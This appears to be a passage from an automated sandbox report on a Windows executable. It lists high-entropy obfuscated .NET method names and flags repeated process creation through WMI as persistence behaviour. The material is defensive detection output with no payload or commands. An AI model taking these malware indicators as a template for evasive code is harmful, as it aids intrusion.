                            Source: LzmJLVB41K.exe, oeiubeMT70heDufFF9d.csHigh entropy of concatenated method names: 'rC9', 'method_0', 'xrNTPyWvNIM', 'Tn4TPEgP3TF', 'P09mCSTrBh6H4yCanhKd', 'IWWphsTrtHw1YFs37yZ8', 'jjwBElTr8wF5qpqUUgr9', 'OWdISVTr5qVfA7OP30i3', 'uTLFV9Trx4slt10wlD7H', 'zJYyl2TreFVnCfBva1K0'
                            Source: LzmJLVB41K.exe, WnLWZhigRCxIL5p1Mqe.csHigh entropy of concatenated method names: 'gr1EsTTZwjE08u6QDb9O', 'DhHLcnTZmc2THEHNwtcQ', 'x0myA6TZvqFqg2smyGp3', 'LmVLiiTZJyrM9Xhinf08', 'iL6BXsTZrCc3UCrpJ7uB', 'zllxo9TZYPEK4GIyo8e6', 'VkrKtMTZaQJ8M9AEvujm', 'ddhTaFTZiRWDhHi1Umfg'
                            Source: LzmJLVB41K.exe, S99bJmRyuNo0up2cC9i.csHigh entropy of concatenated method names: 'KZ3', 'imethod_0', 'L3I', 'ofQTPAKx1bc', 'wN6TRThxbul', 'ibBw7yTeM6BusSdsU9Yg', 'zGL5SvTeq3sNaLOSU9HV', 'o1juJyTeIu9qL5teGcFo', 'NvLBySTeH2At4dmBvpw7', 'agB2lUTeVJm8hYLMMprQ'
                            Source: LzmJLVB41K.exe, jULmqic9wu3ZrxC0nup.csHigh entropy of concatenated method names: 'q76', 'method_0', 'p9e', 'hkB', 'method_1', 'method_2', 'lJlLOnTgBUdYmqASK68I', 'YV5ZPKTgtmmfTP7w6Ny6', 'xNwC5iTg84R1M1oZ0nQk', 'UiacpXG2Nh'
                            Source: LzmJLVB41K.exe, t6fDLh87cglZpDfL8sk.csHigh entropy of concatenated method names: 'method_0', 'YU8', 'method_1', 'method_2', 'E4J8uoItMe', 'Write', 'gj98lkNqn7', 'hYk8QqmcZw', 'Flush', 'vl7'
                            Source: LzmJLVB41K.exe, NDn3cZ1MPbRJ7fHEvEn.csHigh entropy of concatenated method names: 'YKAW9C2Ks4', 'DPfTaGT6KWsg4op7tBpP', 'jmdNNqT6jy3vkGiA1m8q', 'DYI1AYT6gRQunV63jhLq', 'c3sMeoT6Nne3hrsdEGDJ', 'kt5', 'w4i1I3adBm', 'ReadByte', 'get_CanRead', 'get_CanSeek'
                            Source: LzmJLVB41K.exe, dkVWw3EbHTSl5iuU9fO.csHigh entropy of concatenated method names: 'Ve7EJQFDwm', 'n75EwAY7Kx', 'Ma7EmQxtTJ', 'FEjGm3Trl2nXSO16eOJ0', 'ipmRJuTrRlBsHSN2CYuy', 'DhbRRNTruDZ3AsgU07Lj', 'od5PMCTrQSDApvEFRdBm', 'SrmOn1TrPj0gK05wKvqf', 'COJXM4TrcJn7Tynsg91N'
                            Source: LzmJLVB41K.exe, wlPAZBcAN38QgpCsyo9.csHigh entropy of concatenated method names: 'OdUcRxp8yN', 'pmtcu4mubs', 'SY6clu51h4', 'C9scQPHQFi', 'm1qcPkUuaa', 'gQ6cc4xL20', 'rkNcoiPjIy', 'aY5chB4uGB', 'GiZcXIx49M', 'vSqc0Hp9ci'
                            Source: LzmJLVB41K.exe, G3CxgjfLibJGpKM96n.csHigh entropy of concatenated method names: 'vBSjyhk9q', 'hhgqaZTteeFZQdjoOunP', 'vu9USBTt52JVaEwJxCg6', 'v2VIppTtx9Ax1mI3CKXn', 'hFmc5uTtOoRN0O9juR5N', 'aBwyXAY4L', 'KVJEYFfBu', 'nXYMvNlQm', 'LfiqLJpyG', 'aIOI8VpMY'
                            Source: LzmJLVB41K.exe, I7DTChAu8UrOIp1e5ED.csHigh entropy of concatenated method names: 'X9jAQSiIrS', 'sTRAPw4spb', 'Ba2AcD6ShJ', 'zi8AoYnQky', 'ebsFMFT50p6SM8VG55C4', 'qCJuAST5hpcUAGbpGNwJ', 'IWicyeT5XT6tDOVsa0XM', 'l8MHOyT59rVrgUgnZrQT', 'PEJVAZT5s8Rc9GcET4ni', 'twFOCVT5pvGCTdJLWWLI'
                            Source: LzmJLVB41K.exe, TEir8cQK3j4eOtMUW8M.csHigh entropy of concatenated method names: 'P9X', 'vmethod_0', 'o17TRHPCHST', 'fMcTPh9tDfH', 'imethod_0', 'GUMbNcTW67T2uwugQlSM', 'e8a4P5TWD03WXfgBZOKi', 'LeFN2xTWmAI60NYNvVHj', 'BnWOEmTW3C4UcvhoWTgF', 'ihG2xJTWnILGXgA5rGHr'
                            Source: LzmJLVB41K.exe, hrtcpiz0VtAcqnx6Yd.csHigh entropy of concatenated method names: 'UHyTTfw0xH', 'a9cT7lekXa', 'AE3TRXhH7j', 'od7TudwgQI', 'GITTlL1tmL', 'yw3TQLPgsb', 'tM9TcoPxW2', 'H1LxcNT8Qiuj7IYPxUbq', 'LFJfIoT8PrXs7pWab0vH', 'yWsuNlT8ceYJPrmphTQt'
                            Source: LzmJLVB41K.exe, DckT484NW6JmPi3IGQ6.csHigh entropy of concatenated method names: 'FuMTPtI9dik', 'SF0TlBxqG4m', 'BZvW5rTdhdywxoouKW0s', 'A3jqTDTdcIjw5bMR90tV', 'GkHR9eTdo1YdHRoobcPC', 'TPcfBHTdstyHU22L41p5', 'p91HhGTd0iLkpQA2h0Ad', 'Ncdh8lTd9Nwp2AoX3NKP', 'j9CaQUTdp7Wu6vo5RYBw', 'imethod_0'
                            Source: LzmJLVB41K.exe, BxwD7qx0kpEvdNQGOcR.csHigh entropy of concatenated method names: 'JO6xsdjX2G', 'g94B8cTwUYqwVEhqJoJa', 'IGNqHFTw4Ry32YxHHrm2', 'BECeAuTwZ52or8ASlAPb', 'WvAvRoTwdU8OSujfbxOe', 'TR2cLPTwF7THO1Hfqcov', 'SdQgvKTw2iONlZnZ9TYm'
                            Source: LzmJLVB41K.exe, K3tWl6Pu9RpPZ3WkQll.csHigh entropy of concatenated method names: 'O3I', 'P9X', 'WS3TRBUO9Dv', 'vmethod_0', 'imethod_0', 'KVq6j7TjPis1VcdGj1BF', 'svbvX5Tjc5PCOhSL70Tm', 'WJLp94TjlDkNbCKY6TIf', 'T4lciaTjQk4xncwMqI1G', 'SHLJMFTjoLFFxF99fqQo'
                            Source: LzmJLVB41K.exe, js75UaxOqwlu101AVus.csHigh entropy of concatenated method names: 'DB4', 'method_0', 'method_1', 'method_2', 'method_3', 'method_4', 'method_5', 'A47', 'fC4', 'aK3'
                            Source: LzmJLVB41K.exe, zuPU8d8rHlSoSgr57Fb.csHigh entropy of concatenated method names: 'ztn82FPRLF', 'yJC8zPMkIE', 'GWj8bRBM95', 'MdQ8vqO4mJ', 'Ny88JiYX1W', 'hau8wpJaZ4', 'bxf8mqjyNl', 'Lfn83CAxSD', 'GN086YTKP6', 'tAn8D9T089'
                            Source: LzmJLVB41K.exe, zOg4V1lrnSR8tLh1MbY.csHigh entropy of concatenated method names: 'XjelUJTSHF', 'cLkldY82t1', 'TqTlFg3ILV', 'W816r4T1zT8xV8JCtEQE', 'w2Sk35T12ELSFSGhwfmY', 'iAdXgwT1Lwy46EhP0Ykd', 'zH7lbv9PTn', 'XqWlvw438b', 'q4SlJjtBt9', 'b5nlwx8xpu'
                            Source: LzmJLVB41K.exe, E8hveath7kXJqfbnEY8.csHigh entropy of concatenated method names: 'B7Vt007UxN', 'stHt9D1m71', 'yuDtsbXyqV', 'JSLtpRxpPQ', 'ArFtC8adyU', 'merHA2Tvz7YCZBNleMZc', 'RxHnC7Tv2NI59h7Q7X3A', 'p4RqdVTvLJ32e40jtPoN', 'aKdmVmTJSAHNhtJS4f3l', 'ot7CEATJT9TyWKxkydj4'
                            Source: LzmJLVB41K.exe, OTRAKsdSrA8WMUtWxnT.csHigh entropy of concatenated method names: 'EEedRMpvj4', 'SMcduHfW0G', 'mKUpLFTFwu1nb4PRSKfs', 'XKQCuuTFm2tJDBmgWwXG', 'zudQt4TFv3r1hARstkhs', 'i3DbsbTFJ6Cux3O6mBdX', 'jKiViuTF3skKMP92haM9', 'IBytEDTF6Ma0JA4qctSC', 'Sy5dAOs7MF', 'drvsnPTFrDGJoNVGTpPZ'
                            Source: LzmJLVB41K.exe, L7dqqm2kJPmchlaw3s3.csHigh entropy of concatenated method names: 'l6M2x8ns7j', 'UUX2eOpKj4', 'ziB2O4FmcU', 'ArP21NweBG', 'DTW2W32L5k', 'pmq2jCHSOt', 'qbx2g3cLQ2', 'xab2KN2Qkk', 'z1d2NdmDt2', 'd1X2GLtkpi'
                            Source: LzmJLVB41K.exe, omn1Gfj6aNjwcd5L04U.csHigh entropy of concatenated method names: 'wj47IiTnSJrG7C1BVecn', 'UFj67oTDLmk4Q38bCSQO', 'AfdFsDTDzj3NvIXJsmMI', 'k8sjnXVaZT', 'Mh9', 'method_0', 'jtgj40VgY0', 'HrsjZkWLZb', 'dCtjUKUwo4', 'RH1jdC0B4W'
                            Source: LzmJLVB41K.exe, dQUSN2T4WwE1s43qp0C.csHigh entropy of concatenated method names: 'P9X', 'fEkTUbHeZj', 'N2rTPSnfupy', 'imethod_0', 'whSTdtchTB', 'fQSccwT8ZFyhjYRSiOtq', 'iNfIdyT8nyTubW1APLfk', 'N6rgetT84PYwwqQyFWND', 'wq73jxT8UassDR2tCQYI', 'UJjOJeT8daWgUZh9sxH7'
                            Source: LzmJLVB41K.exe, hwii5bGvvAq0J78MhJq.csHigh entropy of concatenated method names: 'P4PTPVxdelv', 'vVuGw0i0Kq', 'JTVGm8DV6n', 'xYiG34dFlu', 'p8POaOT4yPYinIdBTY6i', 'apkiyHT4EUVlZdnrIKVF', 'gUvm5hT4MX6uOpkKCrUD', 'EwWoXUT4qJI6UQgHoEqo', 'LPdH99T4IDwp1jUTG0ZG', 'aZDZi5T4HyyGWM2isupV'
                            Source: LzmJLVB41K.exe, RTnV16y5B94uaXdOEOw.csHigh entropy of concatenated method names: 'jnDyK8Twfx', 'Vsh8w2Ta6elZs7UkUHPV', 'db40H9TamkXBF1fqKLPA', 'zsVcx9Ta3U33bwce96xP', 'LN2ImHTaDBgDEIZsWLPZ', 'KUpyehgmS1', 'P1XyOHHjJG', 'UsRy1Tma6E', 'JSr9tcTavhCeus2MlXo4', 'dwClOSTaYFimPwr1YjwF'
                            Source: LzmJLVB41K.exe, VdHIESyG8EUcHC3e8JV.csHigh entropy of concatenated method names: 'jgSyJ0o9fI', 'vW8ywHjOS2', 'U8DymeivBL', 'l2QwAfTa2SlGJCs2JpLV', 'JBet87Tadw4ifnQFIR8o', 'pbmH4qTaFU2L33ko22KH', 'eEIyioFewp', 'tyvyr2cTxi', 'Fa7yYMoKa9', 'r8iBEfTa4OLKK0VsLm9Y'
                            Source: LzmJLVB41K.exe, IOOlW35L1NYkq3YD7yc.csHigh entropy of concatenated method names: 'JYExScae1x', 'lfjxT3kpwp', 'xv2xARZ5IK', 'orPx7sP5x4', 'dyjxRTG01b', 'NNxxuCtdQQ', 'd6tMHFTwGTSUO9xc2jg3', 'wgEA2STwKaPR31QcarZh', 'PhhYpQTwNEVvfDCJNZgm', 'fJ458UTwadb68NCeCspR'
                            Source: LzmJLVB41K.exe, Fa8oEdjqsvHrKQW3KAI.csHigh entropy of concatenated method names: 'method_0', 'caqjHhNn2j', 'method_1', 'X61', 'Ly2', 'get_CanRead', 'get_CanSeek', 'get_CanWrite', 'get_Length', 'get_Position'
                            Source: LzmJLVB41K.exe, XiVpQk76WKPQidqtc5W.csHigh entropy of concatenated method names: 'uYHR760Je9', 'mIuRRr20JQ', 'MWsRuryRnI', 'JsPItsTelNJhG5X0UTS7', 'uQxGqSTeQXXjNo1HkXrZ', 'wpHQy0TeRAuJZaZQOuTs', 'U1ri9cTeuPodrHGhOHL0', 'EMYRhRabsw', 'WsIgfFTehi2vfPsi4EFa', 'DhAX6yTecIeHjtZb1EEV'
                            Source: LzmJLVB41K.exe, gwsj7UUOH68G5enUw3f.csHigh entropy of concatenated method names: 'tohUWf6RSi', 'hcDUjvkMcX', 'AEYUgirctJ', 'BXhUKwPGPo', 'Dispose', 'al0BMITFy2qmsAmVR92Y', 'RThKjNTFf8afGeIS4Dyr', 'w8hS1LTFk1IBJELxl39w', 'qjMsKFTFEEAZutoLTy8J', 'PV3KJ6TFM9rG96mCa0v0'
                            Source: LzmJLVB41K.exe, QkMfjXQy8cZ4Rtd3VCu.csHigh entropy of concatenated method names: 'V93Q5l00Pm', 'keysghTWWr5BRtykFujD', 'TJj602TWjYDEm2JX6iso', 'A5kvt0TWOT4DlpTxdHqX', 'LiJEUPTW15TeLKJ20hdk', 'q8R2GDTWgkyQvW9rIYB5', 'OQQkSBTWKRSVZOFh4BlX', 'KnBQMe4AxU', 'ateQqI0vvA', 'TaTQIwNilT'
                            Source: LzmJLVB41K.exe, Alushx29ZpQi3KArJrn.csHigh entropy of concatenated method names: 'k9fAuiBq2NK', 'sHsAurVMF5X', 'MCiIPPT2NoQ4OcCFSSWe', 'NpK0aiT2GYZIjgysrs98', 'Oeaep1T2aegsCs8bM1WU', 'tlpv4YT2i5DugFIeZ8Hn', 'CQovrFT2r6J37PptorRv'
                            Source: LzmJLVB41K.exe, QYEY8wOPmuZIqUcZ1Ij.csHigh entropy of concatenated method names: 'HOhOoSDTOA', 'Gh1Ohfkr7u', 'method_0', 'method_1', 'I27', 'c6a', 'C5p', 'smROXvWD4v', 'method_2', 'uc7'
                            Source: LzmJLVB41K.exe, GiVTbCxP923Nflcna4N.csHigh entropy of concatenated method names: 'AZ0xo7JZoa', 'ehaxhLb1qQ', 'r9OxXQFjUL', 'vH7fnPTwm4mm6wMPIMK8', 'LDXd0STwJZnk1ZKoloyi', 'KehHNHTwwylNDLSGsv47', 'A9RxyLTw3PbxuN2j0vLo', 'vW4BxPTw6WhLy4Q5CQTI', 'TPFfhvTwD28w5E0AySkG'
                            Source: LzmJLVB41K.exe, rBHPqPPCygu5pA15Ucd.csHigh entropy of concatenated method names: 'G4uPEVEt8I', 'Ve5EMWTjxxL3BVZIypmj', 'R38gHBTj84gpEyMrZ5hd', 'Bw4g9oTj5nERMiDRohXw', 'TGrRjuTjeyvBAg0jqsxn', 'IP6PkK5kaM', 'sG77JiTjIykgO8Jq27No', 'mvAg5ITjHY3Lvypftaa7', 'oR0lPmTjVjXH4UEcJakb', 'ufKoeoTjMpSA62kD3Nr0'
                            Source: LzmJLVB41K.exe, RAY7x8A6GZIX8T3uGh2.csHigh entropy of concatenated method names: 'UP87QtqGxR', 'gn4kQHTxTI06cYGeleKY', 'o5JMghTxAtrkcXFJJHTK', 'minrwQTx7HLtAg8bOLjV', 'GMtZMATxRKZZ3Kwc44XS', 'J3rUKUT5zLyac3CZDXIb', 'm1NEFETxSxSFG9nQDe7G', 'omwX8WTxu40fdbNRnPhW', 'R8AWwPTxlUkWUljosjwX', 'pfx7Sr81BM'
                            Source: LzmJLVB41K.exe, INhTJBaOBERvyBlYdST.csHigh entropy of concatenated method names: 'qx1aWFIRAx', 'KoTajZ12ay', 'UGnagu6b7D', 'zZPaK0jhFy', 'So4aNn2QJV', 'k9jaGsEa2h', 'V5haaMmbVd', 'CoVaiMFgMP', 'YJEarKdg18', 'aNnaYI7g1k'
                            Source: LzmJLVB41K.exe, v9fMBeE9SF7tuqx2CeR.csHigh entropy of concatenated method names: 'vcOEEDE2Ky', 'fJvu3dTiN2BwdTakZjqN', 'xKmmuFTiG4HNrQlQNa0v', 'PqiRs4TigxG2uLvjoAyv', 'g79Fm3TiKLTxFSO90q5s', 'zsWEp18QWj', 'CYRvFwTie6YGVNJJCDiT', 'F8Ai1FTi5wCbw5K2lsU4', 'PkUp0uTixEt8lH88whYW', 'VJEsbfTiOixUK5yTAsIB'
                            Source: LzmJLVB41K.exe, tJqBKo7tqVPSOFTO0Cx.csHigh entropy of concatenated method names: 'RQc7YpHxtc', 'Con7b89a53', 'LQw7vFKXlF', 'PkeLwkTxb5BhGPfdcoxm', 'epdKW9TxvvZqLLHUdLuh', 'FZbrCpTxrrmZSpv0t1ok', 'a5H3VlTxYiWMAW2wde4e', 'rpK754uHrS', 'zNr7x7R4Ts', 'YCC7eYvrO5'
                            Source: LzmJLVB41K.exe, d4I6rExi1YvgKsDQnRJ.csHigh entropy of concatenated method names: 'XotxYASAL8', 'nNSxbxDEdj', 'kaKxvFdp2g', 'zgHxJCaUyH', 'tQWxwqMBw6', 'Jp2xmZwxQ4', 'GZhx3woWk8', 'T2Ax64NNua', 'oqWxDUTDu4', 'GwcxnM73xw'
                            Source: LzmJLVB41K.exe, YCmwl2sIulduN4lwAZW.csHigh entropy of concatenated method names: 'EBiy0f7LYD', 'bGYy9TsUny', 'VtPSIRTa5umVC5eyDT8d', 'XlfmO0TatJunMFBrda1o', 'P9SCalTa8BAI4AueiY5V', 'UeN5tuTaxct0j1xyh6nk', 'e6iAkoTae9N7mZl04b9q', 'Vadyyx2q4s', 'KDD46uTajvWXXt8vr455', 'mQyCuATa1H9ZWqpDMkTE'
                            Source: LzmJLVB41K.exe, LAbj0HupAKCwpFk7jTG.csHigh entropy of concatenated method names: 'Woeu8kO8nw', 'yYmu5ic69s', 'SdxuxrfPxc', 'tTsNHcTOGvVc30HaFw90', 'Po42sTTOanOTF9RDsa3w', 'JN2vrlTOKWRyAk91GOk0', 'uo7AIUTONkUSmqWkEyjN', 'He8uH6lJua', 'bj0uVXjD28', 'aI25MdTOjNmncYcUxEiJ'
                            Source: LzmJLVB41K.exe, bUalnXuDMOiV63kQvQ4.csHigh entropy of concatenated method names: 'tIBuFn7ntN', 'O51u2JnLx3', 'vcwuLaDdUh', 'Jkluzmjk4u', 'fnElSWchNT', 'ko1lTRXdxx', 'xJplAXnDoa', 'fJ3LkfT1XVdArvXFbuPB', 'X54ZUsT1ohit4wDBhUVO', 'LEvyUJT1he4i1DXpunsN'
                            Source: LzmJLVB41K.exe, Ktvq0jU0VV4pOLWydip.csHigh entropy of concatenated method names: 'tMfUp503JO', 'ANuUy7Yncs', 'My4UqEa8u2', 'BeKUIYRHHT', 'rEAUHioxwp', 'E41UVWt3yC', 'JsdUBceYPf', 'z7aUtQVKKn', 'Dispose', 'Irb1DXTFXhdFsuCNTVfV'
                            Source: LzmJLVB41K.exe, o3jdqM4OO2G2qUoUMh6.csHigh entropy of concatenated method names: 'method_0', 'h59', 'R73', 'pWS4WZv7qt', 'UXjuowTUKVvwZi4lm5LV', 'harKRxTUNfQ9mi1xwfLv', 'kNWFrcTUGRomTKf7k1SK', 'cJIGETTUaKr63TL9mxuI', 'HGtk1BTUihAElCwpbVGR', 'aKhmhKTUraCV2suI7MrO'
                            Source: LzmJLVB41K.exe, wpIikoAEbFx9T2Zeor8.csHigh entropy of concatenated method names: 'Oj0AqnPVfh', 'y49AIFgYYF', 'M3T2RXT5Bc5a8jcJuDgp', 'O4EfGIT5HEsZFZQZQuLj', 'MauuCWT5V2C8DsbZQoyI', 'hMDbDmT5tXxUEkXMqSon', 'NWDP8xT58v7JSp2ivhfr', 'TRmtQMT55JaQldHJ7kSB', 'RiZ5YsT5xMJovgaQ1c8F', 'hSO1w1T5eFg8iFpCOw9o'
                            Source: LzmJLVB41K.exe, ewFOuZcHSiAO8oOwHd8.csHigh entropy of concatenated method names: 'ltI8uFTN8YTy4Rv75KE5', 'JH4XNWTNBo3Z1pefccw6', 'DPRwpnTNtjbS1EWUndjY', 'E6U9LlBh4E', 'ftoQfITNOYusvvOoyNsZ', 'THLwgHTNx0Aifqenfrw5', 'u9E0eVTNejBtfNqR5UvK', 'tiPMBjTN1N8eU1uI5Yak', 'eB9eXSTNWBrp76X1tOL6', 'jFFsTKqv7v'
                            Source: LzmJLVB41K.exe, i2f2FtjNvKeV7nd9F7b.csHigh entropy of concatenated method names: 'q13', 'Sw1', 'method_0', 'uxmjavTwmZ', 'r9qjiYsGKU', 'g5GjrWmKgA', 'PmAjYBrcxw', 'UREjb7iudv', 'sHYjvU9rFV', 'M4nrAZTDGRBAxs6SoqXH'
                            Source: LzmJLVB41K.exe, XXygTFW6iOy4GelEkPY.csHigh entropy of concatenated method names: 'xXaWnsQQGx', 'k6r', 'ueK', 'QH3', 'm9yW4BR2du', 'Flush', 'CriWZoVfM8', 'obHWUfb4LS', 'Write', 'LV9WdhuJjK'
                            Source: LzmJLVB41K.exe, jB9pjU5nWKBQs4XU02Q.csHigh entropy of concatenated method names: 'Jy05ZWGDwd', 'kB95Ue0ila', 'hfF5d244eJ', 'he65F3wdvp', 'tT3524l7B7', 'pTsuuDTw55MV0iWdTQmf', 'JBclk5Twxu5Sj5GJVOPY', 'QkQRg0Twes47d0IRX7d3', 'BsrLHwTwOCGUuafHkjNc', 'gJjx2MTw1UH0ROJlSxpq'
                            Source: LzmJLVB41K.exe, UfbdfLeL6UUYLVMt5HB.csHigh entropy of concatenated method names: 'oSZOSTYRby', 'cIfOTgasJ9', 'Yd7', 'g6AOAvIIMR', 'pFaO7u437q', 'keeORU6iqr', 'fWvOuoVqO4', 'KMZbj1T3a6YYbqhPRQUk', 'Ekh27ET3NjgEHFuHvhAC', 'Ajn0G5T3GcUjhmBiwvgK'
                            Source: LzmJLVB41K.exe, mAHLcrVbgQb08pfPvUm.csHigh entropy of concatenated method names: 'a99', 'yzL', 'method_0', 'method_1', 'x77', 'uqMVJ63XBV', 'J9RVw0MsKI', 'Dispose', 'D31', 'wNK'
                            Source: LzmJLVB41K.exe, r4YPeGtOffRi0UJppow.csHigh entropy of concatenated method names: 'method_0', 'KfDtWrW6ho', 'AEHtjUrsbb', 'gq2tgrhkZp', 'fCYtKwxXTB', 'cgJtNPCsUd', 'kt4tGKCWAu', 'CovSQrTJcQ4UC3AeOQqy', 'mTkJgLTJQpdZtkYMUBei', 'sL6OZkTJPqL1dUqwNPmS'
                            Source: LzmJLVB41K.exe, jvypqJy4BPBprl7E6bc.csHigh entropy of concatenated method names: 'm1I', 'G4q', 'w29', 'LHNTP01EQlg', 'zKlTRJ2qr2o', 'pFPXkBTilah4IPweqY52', 'hcWhmHTiQfarW0jmirLX', 'Sctt2hTiPkvXlrgTTQ0L', 'cgdBA1Tic21MykF9BYoO', 'SEIJkrTioc4VSyLEWsVU'
                            Source: LzmJLVB41K.exe, tc0gYKq0vG5vy2QGlp4.csHigh entropy of concatenated method names: 'Q8cHTGDO6J', 'iW28XMTbpsvtvCBchgRQ', 'ClH6tPTb9HExlKEaBhca', 'jK2FTWTbsvEegg4Fv0n8', 'RwrgCbTbCeqFaY0t8b2i', 'yNRqsM9S6r', 'IutqpKqxbE', 'uPdqC65lxO', 'eLXqft3MXH', 'tS8qkicvKy'
                            Source: LzmJLVB41K.exe, W1yhQpub6yFeZPDjZ5C.csHigh entropy of concatenated method names: 'R6ru3GUSDJ', 'aGQIIDT1SYH6oIX0L8fJ', 'mDBpQeT1TShesVAH8a1h', 'V6PkohT1ATLCgkP6tRiY', 'AIqp0rT17h5F9OBS2eyk', 'U1J', 'P9X', 'DJoTRpWOc6P', 'OqOTRCwMChe', 'cyJTPQM28NU'
                            Source: LzmJLVB41K.exe, yOC1ivO8VMrtFb591Fs.csHigh entropy of concatenated method names: 'iFM', 'method_0', 'method_1', 'method_2', 'method_3', 'lbi', 'Itr', 'smethod_0', 'method_4', 'KPS'
                            Source: LzmJLVB41K.exe, BsRfmRdfV3IS2HGBuC2.csHigh entropy of concatenated method names: 'rcYErmT2PHWneuEynRuM', 'JDenekT2cTQceZWGajYH', 'mexF4Td6DQ', 'Mt2MmnT20MtOpeupZl6p', 'R9wd8xT29aNmhf6Orh63', 'dOaosgT2sxdQ1AJ1nKIt', 'gDFGUuT2pnZy5i3juhdn', 'N0UdEvT2CWmyQCDo7I21', 'rFHSj1T2fNtMHIuTmIqM', 'YINdMUT2kICETsg7uoya'
                            Source: LzmJLVB41K.exe, QlqAGMP8t0KAnnvWepQ.csHigh entropy of concatenated method names: 'PXnPxNbQJS', 'a9IPeGKBc6', 'HuCPOywUfi', 'RfaP1DGqIG', 'JnAPWgyquo', 'kfNPjkUYmf', 'eqIpn2TjvbaElhhHTRY0', 'NtMLDgTjJveXddh7AKks', 'ObdDuSTjwcxugetGx4ph', 'H5kEgUTjmVVWrlcZHlCu'
                            Source: LzmJLVB41K.exe, bBlcWoRBujXlj0soaLJ.csHigh entropy of concatenated method names: 'VZq', 'KZ3', 'XA4', 'imethod_0', 'e23', 'm2sTP7paQlV', 'wN6TRThxbul', 'sddbf6TetZY8UD1X1cic', 'pqElVtTe8M1CbiS3ihta', 'KniaIKTe5A7o7SX4JNGG'
                            Source: LzmJLVB41K.exe, OYp49AWgovh5GVZlLTO.csHigh entropy of concatenated method names: 'Close', 'qL6', 'w5HWNx6gf3', 'wkCWGVj2JF', 'WsjWawe7TS', 'Write', 'get_CanRead', 'get_CanSeek', 'get_CanWrite', 'get_Length'
                            Source: LzmJLVB41K.exe, k2wrCtGOwhHxum7docf.csHigh entropy of concatenated method names: 'GdCGWJoQOv', 'usGGj45m90', 'h35GgqVtGe', 'b6SGKoARY2', 'bcXGNQHVGP', 'JplGGZqghs', 'cT2GaReJu1', 'ErZGi1FGHN', 'zcLGrwt8he', 'oZgGYdjcLB'
                            Source: LzmJLVB41K.exe, nBHP4GAOqTDJsVNMAZA.csHigh entropy of concatenated method names: 'JysArDULRd', 'coMAYxlHyc', 'Qbkqv4T5abIBnVpeSBMu', 'TED1waT5N8G574cTFk80', 'GaleUBT5GEmiuMJMJdLn', 'BZb73FT5iIrZIfvSWLGx', 'o5aAw9T8rN', 'MtjtwxT5vtrJRKdhW5bp', 'yVL0q3T5Y9823UYgupaO', 'aZR9mYT5bKPwtKxgF9gm'
                            Source: LzmJLVB41K.exe, GPu2goRawgB39I08Zk7.csHigh entropy of concatenated method names: 'eXmR2vdIAm', 'XbttKWTOP7oJtVsdWj9h', 'UJ3Sg7TOcC2WbHc9bsIL', 'Lk4GFZTOlZVNTHQ8BCYK', 'MtLMMyTOQ04IhUWZ3keN', 'vLrro1TOhOx1hfl3DMag', 'kcqE1WTOX4TxmekfPNMM', 'H0OFhQTO0RBIPS1dUvMc', 'XaTulZsyY2', 'S1OVU5TOC8FnQymbcvBD'
                            Source: LzmJLVB41K.exe, ggxrBlPJOp6HWJJpuWD.csHigh entropy of concatenated method names: 'K64PUcjULW', 'vX1yxtTgRBhqOnMFYqxo', 'LMcr7sTgAVYj5SsROiQu', 'qcZfDcTg7SK1i5MOSdbZ', 'G4RFXLTgumbKmjViQVT2', 'P9X', 'vmethod_0', 'FyZTR8t4vRc', 'imethod_0', 'Cb9qRlTjz33VgRuR8TuX'
                            Source: LzmJLVB41K.exe, Ftt4ToBHXsaXCACABET.csHigh entropy of concatenated method names: 'Q4iBBt3xCL', 'LxbBt54NOB', 'bblB8v4DLN', 'URlB5ZeYLS', 'McCBxVQmYB', 'nkDM0kTvis9uX0BjpmiF', 'M1n2STTvGNREWEXKjB7K', 'LOTVRHTvaUUU218IFkw2', 'OgF3KuTvrnaXjmMwsyMS', 'DcPtc7TvYdTluD0U6VJW'
                            Source: LzmJLVB41K.exe, HBr6iFevxhAdBQEjae2.csHigh entropy of concatenated method names: 'Rq8ew4pa1t', 'qOTemM1iHq', 'Xixe3YrP8p', 'JmLe6Po1TF', 'khaeDtHH7O', 'DR3ndqT356NchDg2a5Qb', 'U2dbqRT3tAcBJJpRVwBE', 'mPpfjuT38CGQf566DSAw', 'W1P8SsT3xRR2FjoiZUxp'
                            Source: LzmJLVB41K.exe, hU4k0qE3NjnZjOXtpR4.csHigh entropy of concatenated method names: 'lgcTPCG6enu', 'RdPEDRPMCF', 'OyUTPfkj6Tg', 'AAcqF1Tr0SvD8pPFjnha', 'liaS2sTr980HQrxEJIkO', 'BNyVg7Trhmofy4ELFde9', 'JXnGF0TrXTYlniPQvQdM', 'yoe5CpTrsIlKrJY8Rh0N', 'SxqjjMTrp1bHI8UJDgp1', 'k4ZZiETrCtR3cbB8SbH8'
                            Source: LzmJLVB41K.exe, lwBqTdKgpKjbRpQ3xCp.csHigh entropy of concatenated method names: 'Dispose', 'MoveNext', 'get_Current', 'Reset', 'get_Current', 'GetEnumerator', 'GetEnumerator', 'ci7UuBTnHuKgFZlC4YY2', 'f70ZRmTnq5PiLlHybOPy', 'UvRPhqTnImC8H4womYeG'
                            Source: LzmJLVB41K.exe, D0xa2KEU9valmFPDfnP.csHigh entropy of concatenated method names: 'w52', 'o38', 'vmethod_0', 'rDhEFTqAfw', 'uaeTPkf6Dvd', 'P95j1jTrEbpfhn2kwawA', 'aV6UVITrkLTo7fgJFGct', 'krBH8ZTryxAxhDPGYdN0', 'BWe4rUTrMsG03s9btR6b', 'fBNI81TrqLyyOlJycWSf'

                            Persistence and Installation Behavior

                            barindex
                            Creates processes via WMI
                            Source: C:\Users\user\Desktop\LzmJLVB41K.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                            Source: C:\Users\user\Desktop\LzmJLVB41K.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                            Source: C:\Users\user\Desktop\LzmJLVB41K.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                            Source: C:\Users\user\Desktop\LzmJLVB41K.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                            Source: C:\Users\user\Desktop\LzmJLVB41K.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                            Source: C:\Users\user\Desktop\LzmJLVB41K.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                            Source: C:\Users\user\Desktop\LzmJLVB41K.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                            Source: C:\Users\user\Desktop\LzmJLVB41K.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
